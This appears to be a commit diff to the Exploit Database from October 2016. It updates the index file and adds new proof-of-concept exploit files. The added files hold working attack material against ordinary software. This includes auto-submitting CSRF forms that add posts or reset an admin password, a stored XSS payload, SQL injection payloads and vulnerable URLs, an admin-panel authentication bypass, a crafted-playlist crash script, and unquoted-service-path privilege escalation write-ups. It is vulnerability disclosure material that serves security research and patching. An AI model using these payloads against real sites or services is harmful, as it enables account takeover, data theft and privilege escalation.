DB: 2016-10-14

13 new exploits

Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit)
Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)
ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation
Thatware 0.4.6 - SQL Injection
InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation
Simple Blog PHP 2.0 - Multiple Vulnerabilities
Simple Blog PHP 2.0 - SQL Injection

Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow)
Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)

Simple PHP Blog 0.8.4 - (Add Admin) Cross-Site Request Forgery
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)

miniblog 1.0.1 - (Add New Post) Cross-Site Request Forgery
miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)

PHP Press Release - (Add Admin) Cross-Site Request Forgery
PHP Press Release - Cross-Site Request Forgery (Add Admin)
Maian Weblog 4.0 - (Add New Post) Cross-Site Request Forgery
Spacemarc News - (Add New Post) Cross-Site Request Forgery
Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)
Spacemarc News - Cross-Site Request Forgery (Add New Post)
BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery
phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery
BirdBlog 1.4.0 - Cross-Site Request Forgery (Add New Post)
phpEnter 4.2.7 - Cross-Site Request Forgery (Add New Post)

ApPHP MicroBlog 1.0.2 - (Add New Author) Cross-Site Request Forgery
ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)

ApPHP MicroCMS 3.9.5 - (Add Admin) Cross-Site Request Forgery
ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin)
ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation
VOX Music Player 2.8.8 - '.pls' Denial of Service
IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation
Colorful Blog - Stored Cross Site Scripting
Colorful Blog - Cross-Site Request Forgery (Change Admin Password)
Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation
RSS News AutoPilot Script 1.0.1 / 3.1.0 - Admin Panel Authentication Bypass
JonhCMS 4.5.1 - SQL Injection

files.csv

@@ -14233,7 +14233,7 @@ id,file,description,date,author,platform,type,port
 16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
 16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0
-40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
+40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
 16422,platforms/windows/remote/16422.rb,"mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
 16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 - RTSP Response Header Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
@@ -27366,9 +27366,14 @@ id,file,description,date,author,platform,type,port
 30397,platforms/windows/dos/30397.txt,"Microsoft Windows Kernel win32k.sys - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0
 30398,platforms/php/webapps/30398.txt,"InstantCMS 1.10.3 - Blind SQL Injection",2013-12-17,"High-Tech Bridge SA",php,webapps,80
 30399,platforms/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,aix,local,0
+40520,platforms/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0
+40521,platforms/php/webapps/40521.txt,"Thatware 0.4.6 - SQL Injection",2016-10-13,Besim,php,webapps,0
+40522,platforms/windows/local/40522.txt,"InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0
 30401,platforms/php/dos/30401.php,"T1lib - intT1_Env_GetCompletePath Buffer Overflow",2007-07-26,r0ut3r,php,dos,0
 30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x - 'login.asp' Cross-Site Scripting",2007-07-26,d3hydr8,asp,webapps,0
 30403,platforms/php/webapps/30403.txt,"WordPress Plugin WP-FeedStats 2.1 - HTML Injection",2007-07-26,"David Kierznowski",php,webapps,0
+40518,platforms/php/webapps/40518.txt,"Simple Blog PHP 2.0 - Multiple Vulnerabilities",2016-10-13,"Ehsan Hosseini",php,webapps,0
+40519,platforms/php/webapps/40519.txt,"Simple Blog PHP 2.0 - SQL Injection",2016-10-13,"Ehsan Hosseini",php,webapps,0
 30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0
 30413,platforms/windows/dos/30413.py,"PotPlayer 1.5.40688 - '.avi' File Handling Memory Corruption",2013-12-20,ariarat,windows,dos,0
 30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0
@@ -36072,7 +36077,7 @@ id,file,description,date,author,platform,type,port
 39768,platforms/multiple/dos/39768.txt,"OpenSSL - Padding Oracle in AES-NI CBC MAC Check",2016-05-04,"Juraj Somorovsky",multiple,dos,0
 39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
 39770,platforms/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos,0
-39771,platforms/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",linux,local,0
+39771,platforms/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",linux,local,0
 39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0
 39773,platforms/linux/dos/39773.txt,"Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps",2016-05-04,"Google Security Research",linux,dos,0
 39774,platforms/windows/dos/39774.html,"Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing",2016-05-05,"liu zhu",windows,dos,0
@@ -36591,27 +36596,27 @@ id,file,description,date,author,platform,type,port
 40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
 40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
-40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - (Add Admin) Cross-Site Request Forgery",2016-10-07,Besim,php,webapps,0
+40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0
 40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
 40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
 40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
-40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - (Add New Post) Cross-Site Request Forgery",2016-10-09,Besim,php,webapps,0
+40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
 40481,platforms/php/webapps/40481.txt,"ShoreTel Connect ONSITE - Blind SQL Injection",2016-09-19,"Iraklis Mathiopoulos",php,webapps,0
 40482,platforms/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
 40483,platforms/windows/local/40483.txt,"Leap Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
 40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
 40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
-40486,platforms/php/webapps/40486.txt,"PHP Press Release - (Add Admin) Cross-Site Request Forgery",2016-10-09,Besim,php,webapps,0
+40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
 40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
 40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
 40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0
-40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - (Add New Post) Cross-Site Request Forgery",2016-10-10,Besim,php,webapps,0
+40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
-40493,platforms/php/webapps/40493.html,"Spacemarc News - (Add New Post) Cross-Site Request Forgery",2016-10-10,Besim,php,webapps,0
+40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
-40495,platforms/php/webapps/40495.html,"BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80
+40495,platforms/php/webapps/40495.html,"BirdBlog 1.4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,php,webapps,80
-40496,platforms/php/webapps/40496.html,"phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80
+40496,platforms/php/webapps/40496.html,"phpEnter 4.2.7 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,php,webapps,80
 40497,platforms/windows/local/40497.txt,"sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
 40500,platforms/cgi/webapps/40500.py,"AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",cgi,webapps,80
 40501,platforms/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",xml,webapps,0
@@ -36619,7 +36624,7 @@ id,file,description,date,author,platform,type,port
 40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
 40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
 40505,platforms/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting",2016-10-11,Besim,php,webapps,0
-40506,platforms/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - (Add New Author) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,0
+40506,platforms/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,php,webapps,0
 40507,platforms/linux/remote/40507.py,"Subversion 1.6.6 / 1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,linux,remote,0
 40508,platforms/windows/dos/40508.txt,"Cisco Webex Player T29.10 - '.WRF' Use-After-Free Memory Corruption",2016-10-12,COSIG,windows,dos,0
 40509,platforms/windows/dos/40509.txt,"Cisco Webex Player T29.10 - '.ARF' Out-of-Bounds Memory Corruption",2016-10-12,COSIG,windows,dos,0
@@ -36629,4 +36634,12 @@ id,file,description,date,author,platform,type,port
 40516,platforms/php/webapps/40516.txt,"ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting",2016-10-12,Besim,php,webapps,0
 40513,platforms/php/webapps/40513.txt,"OpenCimetiere v3.0.0-a5 - Blind SQL Injection",2016-10-12,Wadeek,php,webapps,0
 40515,platforms/android/dos/40515.txt,"Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",android,dos,0
-40517,platforms/php/webapps/40517.html,"ApPHP MicroCMS 3.9.5 - (Add Admin) Cross-Site Request Forgery",2016-10-12,Besim,php,webapps,0
+40517,platforms/php/webapps/40517.html,"ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin)",2016-10-12,Besim,php,webapps,0
+40523,platforms/windows/local/40523.txt,"ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0
+40524,platforms/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",osx,dos,0
+40525,platforms/windows/local/40525.txt,"IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
+40526,platforms/php/webapps/40526.txt,"Colorful Blog - Stored Cross Site Scripting",2016-10-13,Besim,php,webapps,0
+40527,platforms/php/webapps/40527.txt,"Colorful Blog - Cross-Site Request Forgery (Change Admin Password)",2016-10-13,Besim,php,webapps,0
+40528,platforms/windows/local/40528.txt,"Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
+40529,platforms/php/webapps/40529.txt,"RSS News AutoPilot Script 1.0.1 / 3.1.0 - Admin Panel Authentication Bypass",2016-10-13,"Arbin Godar",php,webapps,0
+40530,platforms/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,php,webapps,0

platforms/osx/dos/40524.py

@@ -0,0 +1,16 @@
+# Exploit Title: VOX Music Player 2.8.8 '.pls' Local Crash PoC
+# Date: 10-12-2016
+# Exploit Author: Antonio Z.
+# Vendor Homepage: http://coppertino.com/vox/mac/
+# Software Link: http://dl.devmate.com/com.coppertino.Vox/Vox.dmg
+# Version: 2.8.8
+# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
+
+import os
+
+evil = '\x90'
+pls = '[playlist]\n' + 'NumberOfEntries=1\n' +'File1' + evil + '\n' + 'Title1=\n' + 'Length1=-1\n'
+
+file = open('Local_Crash_PoC.pls', 'wb')
+file.write(pls)
+file.close()

platforms/php/webapps/40518.txt

@@ -0,0 +1,50 @@
+=====================================================
+# Simple Blog PHP 2.0 - CSRF(Add Post) // Stored XSS
+=====================================================
+# Vendor Homepage: http://simpleblogphp.com/
+# Date: 13 Oct 2016
+# Demo Link : http://simpleblogphp.com/blog/admin.php
+# Version : 2.0
+# Platform : PHP
+# Author: Ashiyane Digital Security Team
+# Contact: hehsan979@gmail.com
+=====================================================
+# CSRF PoC(Add Post):
+<html>
+  <!-- CSRF PoC -->
+  <body>
+    <form action="http://localhost/blog/admin.php" method="POST">
+      <input type="hidden" name="act" value="addPost" />
+      <input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
+      <input type="hidden" name="post_title" value="Hacked" />
+      <input type="hidden" name="post_text" value="Hacked" />
+      <input type="hidden" name="post_limit" value="550" />
+	   <input type="submit" value="Submit request" />
+    </form>
+    <script>
+		document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+
+# Stored XSS PoC:
+<html>
+  <!-- CSRF + XSS Stored PoC -->
+  <body>
+    <form action="http://localhost/blog/admin.php" method="POST">
+      <input type="hidden" name="act" value="addPost" />
+      <input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
+      <input type="hidden" name="post_title" value="<script>alert('XssPoC')</script>" />
+      <input type="hidden" name="post_text" value="Hacked" />
+      <input type="hidden" name="post_limit" value="550" />
+	   <input type="submit" value="Submit request" />
+    </form>
+    <script>
+		document.forms[0].submit();
+    </script>
+  </body>
+</html>
+================================================================================
+# Discovered By : Ehsan Hosseini
+================================================================================

platforms/php/webapps/40519.txt

@@ -0,0 +1,36 @@
+=====================================================
+# Simple Blog PHP 2.0 - SQL Injection
+=====================================================
+# Vendor Homepage: http://simpleblogphp.com/
+# Date: 13 Oct 2016
+# Demo Link : http://simpleblogphp.com/blog/admin.php
+# Version : 2.0
+# Platform : WebApp - PHP
+# Author: Ashiyane Digital Security Team
+# Contact: hehsan979@gmail.com
+=====================================================
+# SQL Injection
+This vulnerability is in admin.php file when we want to edit a post or
+edit a categorie and..., with id parameter can show sql injection.
+
+#PoC:
+Vulnerable Url:
+http://localhost/blog/admin.php?act=editPost&id=[payload]
+http://localhost/blog/admin.php?act=editCat&id=[payload]
+http://localhost/blog/admin.php?act=editComment&id=[payload]
+http://localhost/blog/admin.php?act=comments&post_id=[payload]
+Vulnerable parameter : id
+Mehod : GET
+
+A simple inject :
+Payload : '+order+by+999--+
+http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+
+
+In response can see result :
+Could not execute MySQL query: SELECT * FROM blog_posts WHERE id=''
+order by 999-- ' . Error: Unknown column '999' in 'order clause'
+
+Result of payload: Error: Unknown column '999' in 'order clause'
+=====================================================
+# Discovered By : Ehsan Hosseini
+=====================================================

platforms/php/webapps/40521.txt

@@ -0,0 +1,22 @@
+# Exploit Title :----------------- : Thatware 0.4.6 - (friend.php) - SQL Injection
+# Author :------------------------ : Besim
+# Google Dork :---------------- :  -
+# Date :-------------------------- : 13/10/2016
+# Type :-------------------------- : webapps
+# Platform : -------------------- :  PHP  
+# Vendor Homepage :------- : -
+# Software link : -------------- : https://www.exploit-db.com/apps/13132b3e0eaeffc3fad55fded9e5bdc6-thatware_0.4.6.tar.gz
+
+  
+############################ SQL INJECTION Vulnerabilty ############################
+      
+*-* Code *-* 
+
+include ("header.php");
+$result=mysql_query("select title from stories where sid=$sid")
+
+*-* Vulnerable parameter-: $sid
+ 
+*-* File-----------------: friend.php?sid=(SQL inj)
+
+

platforms/php/webapps/40526.txt

@@ -0,0 +1,20 @@
+# Exploit Title : ----------- : Colorful Blog - Stored Cross Site Scripting
+# Author : -----------------  : Besim
+# Google Dork : ---------  :    -
+# Date : -------------------- : 13/10/2016
+# Type : -------------------- : webapps
+# Platform : --------------- : PHP  
+# Vendor Homepage :-- : -
+# Software link : --------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html
+
+
+Description : 
+
+# Vulnerable link : http://site_name/path/single.php?kat=kat&url='post_name'
+
+*-*-*-*-*-*-*-*-* Stored XSS Payload *-*-*-*-*-*-*-*-* 
+
+*-* Vulnerable URL : http://site_name/path/single.php?kat=kat&url='post_name'    ---   Post comment section
+*-* Vuln. Parameter : adsoyad
+*-* POST DATA        :  adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post
+

platforms/php/webapps/40527.txt

@@ -0,0 +1,33 @@
+# Exploit Title :----------- : Colorful Blog - Cross-Site Request Forgery  (Change Admin Pass)
+# Author :------------------ : Besim
+# Google Dork :---------- :  -
+# Date :--------------------- : 13/10/2016
+# Type :--------------------- : webapps
+# Platform :---------------- : PHP  
+# Vendor Homepage :-- : -
+# Software link :---------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html
+
+
+Description : 
+
+You can change admin's password with CSRF, if you know admin's username
+
+########################### CSRF PoC ###############################
+
+<html>
+  <!-- CSRF PoC -->
+  <body>
+    <form action="http://site_name/path/yonetim/admin.php" method="POST">
+      <input type="hidden" name="username" value="admin_username" />
+      <input type="hidden" name="password" value="besim" />
+      <input type="hidden" name="gonder" value="Kaydet" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+
+####################################################################

platforms/php/webapps/40529.txt

@@ -0,0 +1,22 @@
+# Exploit Title: RSS News AutoPilot Script - Admin Panel Authentication Bypass
+# Date: 14 October 2016
+# Exploit Author: Arbin Godar
+# Website : ArbinGodar.com
+# Software Link: https://codecanyon.net/item/rss-news-autopilot-script/11812898
+# Version: 1.0.1 to 3.1.0
+
+-------------------------------------------------------------------------------
+
+Description:
+An Attackers are able to completely takeover the web application using RSS News - AutoPilot Script as they can gain access to the admin panel and manage the website as an admin.
+
+Steps to Reproduce:
+Step 1: Add: http://victim-site.com/admin/login.php in a rule list on No-Redirect Extension.
+Step 2: Access: http://victim-site.com/admin/index.php
+Step 3: Bypassed.
+
+PoC Video: https://www.youtube.com/watch?v=jldF-IPgkds
+
+Impact: Unauthenticated attackers are able to gain full access to the administrator panel and thus have total control over the web application.
+
+Fix/Patch: Make use of PHP exit() or die() function. / Update to latest version.

platforms/php/webapps/40530.txt

@@ -0,0 +1,15 @@
+# Exploit Title :----------------- : JonhCMS 4.5.1 - (go.php?id) - SQL Injection
+# Author :------------------------ : Besim
+# Google Dork :---------------- :  -
+# Date :-------------------------- : 14/10/2016
+# Type :-------------------------- : webapps
+# Platform : -------------------- :  PHP  
+# Vendor Homepage :------- : -
+# Software link : -------------- : http://wmscripti.com/php-scriptler/johncms-icerik-yonetim-scripti.html
+
+############ SQL INJECTION Vulnerabilty ##############
+
+
+-*-*- :  Vulnerable code----------: $req = mysql_query("SELECT * FROM `cms_ads` WHERE `id` = '$id'");
+-*-*- :  Vulnerable parameter--: $id
+-*-*- :  Vulnerable file------------: http://site_name/path/go.php?id=[SQL injection code]

platforms/windows/local/40520.txt

@@ -0,0 +1,32 @@
+----------------------------------------------------------------------------------------------------------
+# Exploit Title:   ASLDRService ATK Hotkey- Privilege Escalation Unquoted Service Path
+# Date: 13/10/2016
+# Exploit Author : Cyril Vallicari
+# Vendor Homepage: www.asus.com
+# Version:  1.0.69.0
+# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
+ 
+The application suffers from an unquoted service path issue impacting the service 'ASLDRService' deployed as part of ATK Hotkey
+This could potentially allow an authorized but non-privileged local user to execute arbitrary code witystem privileges on the system.
+ 
+POC :
+ 
+ 
+C:\Users\Utilisateur>sc qc ASLDRService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: ASLDRService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ASLDRSrv.exe
+        LOAD_ORDER_GROUP   : ShellSvcGroup
+        TAG                : 0
+        DISPLAY_NAME       : ASLDR Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+Additional notes :
+
+https://hackerone.com/blog/asus-vulnerability-disclosure-deja-vu

platforms/windows/local/40522.txt

@@ -0,0 +1,30 @@
+# Exploit Title:   InsOnSrv Asus InstantOn- Privilege Escalation Unquoted Service Path vulnerability
+# Date: 13/10/2016
+# Exploit Author : Cyril Vallicari
+# Vendor Homepage: www.asus.com
+# Version:  2.3.1.1
+# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
+ 
+The application suffers from an unquoted service path issue impacting the service 'ASUS InstantOn (InsOnSrv.exe)' deployed as part of Asus InstantOn
+This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.
+ 
+POC :
+ 
+ 
+C:\Users\Utilisateur>sc qc "ASUS InstantOn"
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: ASUS InstantOn
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\ASUS InstantOn\InsOnSrv.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ASUS InstantOn Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+Additional notes :
+
+https://hackerone.com/blog/asus-vulnerability-disclosure-deja-vu

platforms/windows/local/40523.txt

@@ -0,0 +1,31 @@
+# Exploit Title:   ATKGFNEXSrv ATKGFNEX- Privilege Escalation Unquoted Service Path vulnerability
+# Date: 13/10/2016
+# Exploit Author : Cyril Vallicari
+# Vendor Homepage: www.asus.com
+# Version:  1.0.11.1
+# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
+ 
+The application suffers from an unquoted service path issue impacting the service 'ATKGFNEXSrv (GFNEXSrv.exe)' deployed as part of ATKGFNEX
+
+This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.
+ 
+POC :
+ 
+ 
+C:\Users\Utilisateur>sc qc "ATKGFNEXSrv"
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: ATKGFNEXSrv
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
+        LOAD_ORDER_GROUP   : ShellSvcGroup
+        TAG                : 0
+        DISPLAY_NAME       : ATKGFNEX Service
+        DEPENDENCIES       : ASMMAP64
+        SERVICE_START_NAME : LocalSystem
+
+Additional notes :
+
+https://hackerone.com/blog/asus-vulnerability-disclosure-deja-vu

platforms/windows/local/40525.txt

@@ -0,0 +1,44 @@
+#########################################################################
+# Exploit Title: IObit Malware Fighter Unquoted Service Path Privilege
+Escalation
+# Date: 12/10/2016
+# Author: Amir.ght
+# Vendor Homepage: http://www.iobit.com/en/index.php
+# Software Link:
+http://www.iobit.com/downloadcenter.php?product=malware-fighter-free
+#version : 4.3.1  (Latest)
+# Tested on: Windows 7
+##########################################################################
+
+IObit Malware Fighter installs two service with an unquoted service path
+To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+-------------------------------------------
+C:\>sc qc IMFservice
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: IMFservice
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\IObit\IObit Malware
+Fighter\IMFsrv.exe
+        LOAD_ORDER_GROUP   : System Reserved
+        TAG                : 1
+        DISPLAY_NAME       : IMF Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+-----------------------------------------
+C:\>sc qc LiveUpdateSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: LiveUpdateSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : LiveUpdate
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem

platforms/windows/local/40528.txt

@@ -0,0 +1,30 @@
+#########################################################################
+# Exploit Title: Hotspot Shield Unquoted Service Path Privilege Escalation
+# Date: 13/10/2016
+# Author: Amir.ght
+# Vendor Homepage: https://www.hotspotshield.com
+# Software Link:
+https://www.hotspotshield.com/download/
+#version : 6.0.3  (Latest)
+# Tested on: Windows 7
+##########################################################################
+
+Hotspot Shield installs as a service with an unquoted service path
+To properly exploit this vulnerability,
+the local attacker must insert an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run
+with elevated privileges.
+-------------------------------------------
+C:\>sc qc hshld
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: hshld
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Hotspot Shield\bin\cmw_srv.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Hotspot Shield Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem